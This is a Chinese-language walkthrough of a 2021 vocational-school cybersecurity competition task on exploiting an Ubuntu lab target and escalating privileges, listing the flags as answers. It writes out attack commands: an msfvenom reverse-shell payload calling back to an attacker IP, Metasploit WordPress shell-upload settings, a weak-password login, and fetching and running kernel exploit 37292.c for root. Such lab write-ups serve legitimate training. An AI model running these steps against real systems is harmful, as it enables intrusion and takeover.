2021年中职“网络安全“江西省赛题—B-1:系统漏洞利用与提权

2021年中职"网络安全"江西省赛题—B-1:系统漏洞利用与提权

  • B-1:系统漏洞利用与提权

B-1:系统漏洞利用与提权

任务环境说明:
 服务器场景:PYsystem001
 服务器场景操作系统:Ubuntu(显示链接)
 服务器用户名:未知 密码:未知

  1. 使用nmap扫描靶机系统,将靶机开放的端口号按从小到大的顺序作为FLAG(形式:[端口1,端口…,端口n])提交;

nmap -sV ip 扫描

2021年中职“网络安全“江西省赛题—B-1:系统漏洞利用与提权_第1张图片

  1. 通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])提交;

通过题目我们知道靶机有网站,我们利用kali中的dirb扫描网站的后台。
优先扫描特殊端口:dirb http://172.16.105.245:8080/
2021年中职“网络安全“江西省赛题—B-1:系统漏洞利用与提权_第2张图片

扫描出后台地址,通过题目提示弱口令登录
2021年中职“网络安全“江西省赛题—B-1:系统漏洞利用与提权_第3张图片

falg[admin,123456]
4. 利用Kali渗透机生成反弹木马,将生成木马命令执行后提示的第四行的首个单词作为FLAG(形式:[单词])提交;
这里固定的falg:[Payload]
命令:Msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.103 lport=8888 -f exe -o shell.exe
在这里插入图片描述
5. 对上述木马文件进行修改后上传到靶机系统中,使用MSF开启监听,将获得的当前权限的用户名作为FLAG(形式:[用户名])提交;

我这里没有用这个上传的,我用的是msf中的wp_admin_shell_upload
set rhost 172.16.105.245
set username admin
set password 123456
set targeturi /wordpress
2021年中职“网络安全“江西省赛题—B-1:系统漏洞利用与提权_第4张图片
shell连接后whoami查看权限
falg[daemon]
2021年中职“网络安全“江西省赛题—B-1:系统漏洞利用与提权_第5张图片
7. 查看系统内核版本信息,将系统内核版本号作为FLAG(形式:[版本号])提交;

命令:uname -a查看系统内核版本号
falg[3.13.0]
在这里插入图片描述
8. 在Kali攻击机中查找可使用的漏洞源码,将找到的漏洞源码文件名作为FLAG(形式:[文件名])提交;

利用kali中的searchsploit命令查看可使用的漏洞源码
命令searchsploit 3.13.0
falg[37292.c]
在这里插入图片描述
9. 利用上述漏洞源码后获得到的靶机/root下的唯一.txt文件的文件名作为FLAG(形式:[文件名])提交;

进入存放漏洞源码的目录 cd /usr/share/exploitdb/exploits/linux/local/
在这里插入图片描述

把源码复制到kali自带的网站目录下 cp 37292.c /var/www/html/
在这里插入图片描述

启动kali的apche服务

在这里插入图片描述

使用python切换至交互式shell
命令:python -c ‘import pty;pty.spawn(“/bin/bash”)’
在这里插入图片描述
使用命令wget把刚刚上传中37292.c文件下载下来

2021年中职“网络安全“江西省赛题—B-1:系统漏洞利用与提权_第6张图片

编译37292.c生成shell文件
运行shell文件,获得root权限
2021年中职“网络安全“江西省赛题—B-1:系统漏洞利用与提权_第7张图片
进入root目录查看txt文件名为adftutij.txt
flag[adftutij.txt]
2021年中职“网络安全“江西省赛题—B-1:系统漏洞利用与提权_第8张图片
11. 利用上述漏洞源码后将获得到的靶机/root下的唯一.txt文件的文件内容作为FLAG(形式:[文件内容])提交。
cat查看文件内容
flag[hyjufk983]
2021年中职“网络安全“江西省赛题—B-1:系统漏洞利用与提权_第9张图片

你可能感兴趣的:(中职网络安全,安全,linux,网络安全)